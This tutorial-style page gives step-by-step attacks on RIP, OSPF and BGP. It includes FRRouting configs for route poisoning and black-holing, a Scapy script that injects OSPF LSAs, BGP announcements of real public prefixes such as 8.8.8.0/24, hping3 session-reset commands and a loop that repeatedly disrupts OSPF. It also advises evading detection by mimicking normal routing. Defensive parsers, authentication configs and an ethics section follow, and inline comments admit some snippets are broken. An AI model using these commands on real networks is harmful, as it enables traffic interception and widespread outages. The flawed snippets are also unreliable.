Routing Protocol Attacks

Understanding Routing Protocol Attacks - Dynamic Routing Manipulation

What Are Routing Protocol Attacks?

Simple Definition: Routing protocol attacks manipulate dynamic routing protocols like RIP, OSPF, and BGP to redirect network traffic, create routing loops, or cause network outages by injecting false routing information into network infrastructure.

Technical Definition: Routing protocol attacks exploit vulnerabilities in dynamic routing protocols to inject malicious routing advertisements, manipulate route metrics, establish unauthorized peering relationships, or corrupt routing tables to achieve traffic interception, network disruption, or security control bypass.

Why Routing Protocol Attacks Work

Routing protocol attacks succeed due to inherent protocol design limitations and implementation weaknesses:

  • Trust-Based Design: Most routing protocols trust received routing updates without strong authentication
  • Automatic Convergence: Routers automatically accept and propagate routing changes throughout the network
  • Metric Manipulation: Attackers can advertise better routes to hijack traffic flows
  • Weak Authentication: Many deployments lack or use weak authentication mechanisms

Attack Process Breakdown

Normal Routing Protocol Operation

  1. Neighbor Discovery: Routers discover adjacent routers through hello packets
  2. Topology Exchange: Share routing table information with neighbors
  3. Route Calculation: Compute best paths using protocol-specific metrics
  4. Table Updates: Install optimal routes in routing and forwarding tables
  5. Convergence: Network achieves consistent routing state across all routers

Routing Attack Exploitation

  1. Protocol Analysis: Identify routing protocol in use and authentication status
  2. Neighbor Spoofing: Establish unauthorized adjacencies with target routers
  3. Route Injection: Advertise malicious routes with attractive metrics
  4. Traffic Hijacking: Intercept traffic flows through advertised routes
  5. Network Disruption: Create routing loops or black holes to deny service

Real-World Impact

Traffic Interception: Redirect network traffic through attacker-controlled infrastructure for man-in-the-middle attacks

Service Disruption: Create routing black holes or loops causing widespread network outages

Corporate Network Compromise: Access internal networks by manipulating enterprise routing protocols

ISP-Level Attacks: BGP hijacking can redirect internet traffic affecting millions of users

Financial Impact: Cryptocurrency hijacking and financial transaction interception through route manipulation

Technical Concepts

Routing Information Protocol (RIP)

Protocol Characteristics:

  • Distance vector routing protocol
  • Uses hop count as metric (maximum 15 hops)
  • Periodic updates every 30 seconds
  • Minimal authentication capabilities

Attack Vectors:

  • Route poisoning with false metric information
  • Routing loop creation through metric manipulation
  • Unauthorized route advertisement

Open Shortest Path First (OSPF)

Protocol Characteristics:

  • Link-state routing protocol
  • Uses cost-based metrics
  • Area-based hierarchical design
  • Supports authentication mechanisms

Attack Vectors:

  • LSA (Link State Advertisement) injection
  • Hello packet manipulation
  • Router ID spoofing
  • Area flooding attacks

Border Gateway Protocol (BGP)

Protocol Characteristics:

  • Path vector routing protocol
  • Used for inter-domain routing
  • AS (Autonomous System) path attributes
  • Policy-based routing decisions

Attack Vectors:

  • Route hijacking through false origination
  • Path manipulation through AS prepending
  • BGP session hijacking
  • Prefix deaggregation attacks

Technical Implementation

Prerequisites

Network Requirements:

  • Access to network segment with routing protocols enabled
  • Understanding of network topology and routing domains
  • Ability to establish routing protocol adjacencies

Essential Tools:

  • FRRouting: Open source routing protocol suite
  • Quagga: Routing software package
  • Scapy: Custom routing packet crafting
  • TCPDump: Routing protocol traffic analysis

Essential Command Sequence

Step 1: Routing Protocol Discovery

# Identify active routing protocols
tcpdump -i eth0 -v 'port 179 or port 520 or proto 89'
# Port 179: BGP traffic
# Port 520: RIP traffic
# Proto 89: OSPF traffic
# Captures routing protocol communications

# Analyze OSPF hello packets
# ip[21] is the OSPF type byte when the IP header carries no options (ip[9] is the IP protocol field, not the OSPF type)
tcpdump -i eth0 -v 'proto 89 and ip[21] == 1'
# OSPF type 1 = Hello packets
# Reveals area IDs, router IDs, and authentication type

# Monitor RIP updates
tcpdump -i eth0 -v 'port 520'
# Shows routing table exchanges
# Identifies network prefixes and metrics
# Reveals RIP version and authentication status

Purpose: Identify which routing protocols are active and analyze their current configuration and security status.
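The capture above reveals area IDs, router IDs and the authentication type of each OSPF Hello; the following parser is an added example (not part of the original page) that extracts those fields from the raw OSPFv2 header and flags any Hello that is not cryptographically authenticated. The packet bytes are constructed inline for the example; on a real capture you would feed it the bytes that follow the IP header.

```python
import struct
from dataclasses import dataclass, field
from ipaddress import IPv4Address

# OSPFv2 AuType values (RFC 2328 appendix D); type 2 covers MD5 and RFC 5709 HMAC-SHA keys
AUTH_TYPES = {0: "null", 1: "simple-password", 2: "cryptographic"}

@dataclass
class OspfHello:
    router_id: str
    area_id: str
    auth_type: int
    hello_interval: int
    dead_interval: int
    neighbors: list = field(default_factory=list)

def parse_ospf_hello(pkt: bytes) -> OspfHello:
    """Parse an OSPFv2 Hello (type 1) from the bytes following the IP header.
    The OSPF checksum is not verified: this is an inventory tool, not a validator."""
    if len(pkt) < 24:
        raise ValueError("truncated OSPF header")
    version, ptype, length, rid, area, _csum, autype = struct.unpack("!BBHIIHH", pkt[:16])
    if version != 2 or ptype != 1:
        raise ValueError(f"not an OSPFv2 Hello (version={version}, type={ptype})")
    # 24-byte header + 20-byte Hello body + 4 bytes per listed neighbor
    if length < 44 or length > len(pkt) or (length - 44) % 4:
        raise ValueError("bad declared length for a Hello")
    body = pkt[24:length]   # 8 bytes of authentication data follow the 16-byte fixed header
    _mask, hello_int, _opts, _prio, dead_int, _dr, _bdr = struct.unpack("!IHBBIII", body[:20])
    nbrs = [str(IPv4Address(n)) for (n,) in struct.iter_unpack("!I", body[20:])]
    return OspfHello(str(IPv4Address(rid)), str(IPv4Address(area)), autype, hello_int, dead_int, nbrs)

def audit_hello(h: OspfHello) -> list:
    """Return the finding a defender acts on: anything short of cryptographic authentication."""
    findings = []
    if h.auth_type != 2:
        name = AUTH_TYPES.get(h.auth_type, f"unknown({h.auth_type})")
        findings.append(f"router {h.router_id} in area {h.area_id} uses {name} authentication")
    return findings

# Constructed sample: a Hello from router 1.1.1.1 in area 0.0.0.0 with AuType 0 (null),
# hello/dead 10/40 s, DR 192.168.1.1, listing one neighbor 2.2.2.2 (length 24 + 20 + 4 = 48)
SAMPLE_HELLO = (
    struct.pack("!BBHIIHH", 2, 1, 48, int(IPv4Address("1.1.1.1")), 0, 0, 0)
    + bytes(8)
    + struct.pack("!IHBBIII", int(IPv4Address("255.255.255.0")), 10, 0x02, 1, 40,
                  int(IPv4Address("192.168.1.1")), 0)
    + struct.pack("!I", int(IPv4Address("2.2.2.2")))
)
```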

Step 2: RIP Attack Implementation

Install and Configure Routing Software:

# Install FRRouting for protocol testing
apt update && apt install frr
# FRR only starts daemons marked yes in /etc/frr/daemons, so enable ripd first
sed -i 's/^ripd=no/ripd=yes/' /etc/frr/daemons

# Configure RIP routing daemon
cat > /etc/frr/ripd.conf << EOF
!
router rip
 version 2
 network 192.168.1.0/24
 redistribute connected
 no auto-summary
!
EOF

# Start RIP daemon
systemctl start frr
systemctl enable frr
vtysh -c "conf t" -c "router rip" -c "network 192.168.1.0/24"

RIP Route Poisoning Attack:

# Advertise malicious routes with better metrics
vtysh << EOF
configure terminal
router rip
network 0.0.0.0/0
redistribute static metric 1
exit
ip route 10.0.0.0/8 null0
ip route 172.16.0.0/12 null0
ip route 192.168.0.0/16 null0
exit
write memory
EOF

# Monitor route propagation (-l line-buffers tcpdump so grep sees each line immediately)
tcpdump -l -i eth0 -v 'port 520' | grep -E "(10\.|172\.|192\.)"
# Watch for malicious routes being advertised
# Verify route injection success

Step 3: OSPF Manipulation

OSPF LSA Injection with Scapy:

#!/usr/bin/env python3
from scapy.all import *
from scapy.contrib.ospf import *   # the OSPF layers live in scapy.contrib, not scapy.all

# Craft malicious OSPF LSA
ospf_lsa = IP(src="192.168.1.10", dst="224.0.0.5")/\
           OSPF_Hdr(type=4, area="0.0.0.1")/\
           OSPF_LSUpd(lsalist=[
               OSPF_Router_LSA(
                   adrouter="1.1.1.1",
                   seq=0x80000001,
                   linklist=[
                       OSPF_Link(id="10.0.0.0", data="255.0.0.0", metric=1)
                   ]
               )
           ])

# Send malicious LSA
send(ospf_lsa)

Manual OSPF Configuration Attack:

# Configure OSPF with malicious advertisements
# (area 0 is the backbone and cannot be a stub area; "subnets" is IOS-only syntax, FRR redistributes all static routes)
vtysh << EOF
configure terminal
router ospf
 network 192.168.1.0/24 area 0
 redistribute static
exit
ip route 10.0.0.0/8 null0
ip route 172.16.0.0/12 null0
exit
write memory
EOF

# Monitor OSPF database changes
vtysh -c "show ip ospf database"
# Verify LSA injection and propagation
# Check route installation in routing table

Step 4: BGP Hijacking Techniques

Basic BGP Session Establishment:

# Configure BGP for route injection
vtysh << EOF
configure terminal
router bgp 65001
 bgp router-id 1.1.1.1
 neighbor 192.168.1.1 remote-as 65000
 neighbor 192.168.1.1 description "Target Router"
 network 10.0.0.0/8
 network 172.16.0.0/12
 network 192.168.0.0/16
exit
write memory
EOF

# Monitor BGP session establishment
vtysh -c "show ip bgp summary"
# Check neighbor status and route advertisements
# Verify route propagation to upstream providers

Advanced BGP Route Hijacking:

# Advertise prefixes and shape the outbound AS path with a route-map
# (note: prepending lengthens the AS path, which makes the route less attractive to other speakers, not more)
vtysh << EOF
configure terminal
router bgp 65001
 network 8.8.8.0/24
 network 1.1.1.0/24
exit
route-map HIJACK permit 10
 set as-path prepend 65001
exit
router bgp 65001
 neighbor 192.168.1.1 route-map HIJACK out
exit
write memory
EOF

Step 5: Traffic Redirection Verification

# Monitor traffic interception success (double quotes so the command substitution is evaluated)
tcpdump -i eth0 -c 100 "not host $(hostname -I | cut -d' ' -f1)"
# Capture traffic from other hosts
# Indicates successful route hijacking

# Test specific destination reachability
traceroute 8.8.8.8
# Should show path through attacker system
# Confirms successful route injection

# Verify routing table modifications on targets
# From victim systems:
ip route show
# Look for routes pointing to attacker
# Confirms routing protocol manipulation success

Purpose: Confirm that injected routes are being used and traffic is flowing through attacker-controlled paths.

Attack Variations

Multi-Protocol Coordination

# Coordinate RIP and OSPF attacks
# Use RIP for access networks and OSPF for backbone networks
# FRR runs all daemons under a single service: set ripd=yes and ospfd=yes in /etc/frr/daemons
# (separate ripd/ospfd units are Quagga-style), then restart the service
systemctl restart frr
# Create comprehensive routing disruption

Metric Manipulation

# RIP route poisoning with count-to-infinity
vtysh << EOF
configure terminal
router rip
 redistribute static metric 16
exit
ip route 10.0.0.0/8 null0
EOF
# Metric 16 = infinity in RIP
# Creates routing black hole

BGP Session Hijacking

# TCP sequence prediction for BGP hijacking
hping3 -S -p 179 -c 10 192.168.1.1
# Analyze sequence number patterns
# Attempt TCP session takeover for established BGP sessions

# BGP RESET attack
hping3 -R -p 179 -s 179 -a 192.168.1.2 192.168.1.1
# -R: Reset flag
# Terminates BGP sessions causing routing convergence

Common Issues and Solutions

Problem: Unable to establish routing adjacencies

  • Solution: Check authentication configuration, verify network connectivity, ensure proper router IDs

Problem: Injected routes not propagated

  • Solution: Verify administrative distance, check route filters, ensure proper protocol configuration

Problem: BGP session rejected

  • Solution: Verify AS numbers, check peer authentication, ensure proper neighbor configuration

Problem: Attack detected by monitoring systems

  • Solution: Use legitimate AS numbers, reduce advertisement frequency, mimic normal routing behavior

Advanced Techniques

Route Leak Attacks

# Configure route leaking between providers
# (as written this will not load: route-reflector-client is valid only for iBGP neighbours, and both peers here are eBGP)
vtysh << EOF
configure terminal
router bgp 65001
 neighbor 192.168.1.1 remote-as 65000
 neighbor 192.168.2.1 remote-as 65002
 # Leak routes between providers
 address-family ipv4
  neighbor 192.168.1.1 route-reflector-client
  neighbor 192.168.2.1 route-reflector-client
 exit-address-family
exit
EOF

Convergence Delay Exploitation

# Time routing updates to maximize disruption
# Send updates during network maintenance windows
# Exploit slow convergence in large networks
while true; do
    vtysh -c "clear ip ospf process"
    sleep 60
done

Multi-Homed Attack Scenarios

# Attack from multiple network connections
# Configure different AS numbers on each interface
# Create conflicting routing advertisements
# Maximize network disruption and traffic capture

Detection and Prevention

Detection Indicators

  • Unexpected routing table changes
  • New BGP sessions from unknown peers
  • Routing loops or suboptimal paths
  • Traffic flowing through unexpected routes
  • Routing protocol authentication failures

Prevention Measures

Authentication Configuration:

# OSPF authentication (FRR/IOS-style syntax; the area statement lives under the OSPF process,
# the key and mode on each interface, and every router in the area must use the same key)
router ospf
 area 0 authentication message-digest
interface eth0
 ip ospf authentication message-digest
 ip ospf message-digest-key 1 md5 SecurePassword

# BGP authentication (TCP MD5 signature on the session, configured identically on both peers)
router bgp 65000
 neighbor 192.168.1.1 password SecureBGPPassword

Route Filtering:

# BGP prefix filtering: permit only the expected prefix range, then bind the route-map inbound on the peer
# (prefix-lists end in an implicit deny; the explicit deny below just makes the intent visible)
ip prefix-list ALLOWED permit 10.0.0.0/8 le 24
ip prefix-list ALLOWED deny 0.0.0.0/0 le 32
route-map FILTER permit 10
 match ip address prefix-list ALLOWED
router bgp 65000
 neighbor 192.168.1.1 route-map FILTER in

Monitoring and Alerting:

  • Deploy routing protocol monitoring systems
  • Implement BGP route origin validation (ROV)
  • Monitor for unexpected routing changes
  • Log all routing protocol adjacency changes
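As an added example of the monitoring these bullets call for (not code from the original page), the check below compares observed BGP announcements against an expected prefix-to-origin-AS map, which is the same question route origin validation asks of a ROA, and also flags more-specific announcements (the deaggregation hijack pattern) and announcements learned from unknown peers. The expected map, peer list and observed announcements are constructed samples using documentation prefixes and ASNs.

```python
from dataclasses import dataclass
from ipaddress import ip_network

@dataclass(frozen=True)
class Announcement:
    prefix: str       # prefix as seen in the UPDATE or collector feed
    origin_as: int    # rightmost AS in the AS_PATH
    peer: str         # BGP speaker the announcement was learned from

def check_announcements(expected: dict, known_peers: set, observed: list) -> list:
    """Return (announcement, reason) pairs for origin mismatches, more-specifics of
    prefixes we expect to originate, and announcements from unknown peers."""
    exp = {ip_network(p): asn for p, asn in expected.items()}
    alerts = []
    for a in observed:
        net = ip_network(a.prefix)
        if a.peer not in known_peers:
            alerts.append((a, f"learned from unknown peer {a.peer}"))
        if net in exp:
            if exp[net] != a.origin_as:
                alerts.append((a, f"origin AS {a.origin_as} differs from expected {exp[net]}"))
            continue
        # a more-specific of one of our prefixes wins longest-match regardless of AS path
        covering = [str(p) for p in exp if p.version == net.version and net.subnet_of(p)]
        if covering:
            alerts.append((a, f"more-specific of {covering[0]} (possible deaggregation hijack)"))
    return alerts

# Constructed sample: documentation prefixes (RFC 5737) and documentation ASNs (RFC 5398)
EXPECTED = {"203.0.113.0/24": 64500, "198.51.100.0/24": 64500}
KNOWN_PEERS = {"192.0.2.1"}
OBSERVED = [
    Announcement("203.0.113.0/24", 64500, "192.0.2.1"),    # legitimate
    Announcement("198.51.100.0/24", 64511, "192.0.2.1"),   # origin hijack
    Announcement("203.0.113.128/25", 64500, "192.0.2.9"),  # more-specific from an unknown peer
]
```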

Professional Context

Legitimate Use Cases

  • Network Security Testing: Validating routing protocol security configurations
  • Disaster Recovery: Testing routing failover and convergence behavior
  • Performance Analysis: Understanding routing protocol overhead and convergence times
  • Education: Learning routing protocol behavior in controlled environments

Legal and Ethical Requirements

Authorization: Routing attacks can cause widespread network disruption - explicit written permission essential

Scope Definition: Clearly identify which routing domains are in-scope for testing

Impact Assessment: Document potential for service outages and traffic interception

Coordination: Work with network operations teams to minimize business impact


Routing protocol attacks highlight the critical importance of proper authentication, filtering, and monitoring in dynamic routing environments, demonstrating how protocol vulnerabilities can enable large-scale network compromise.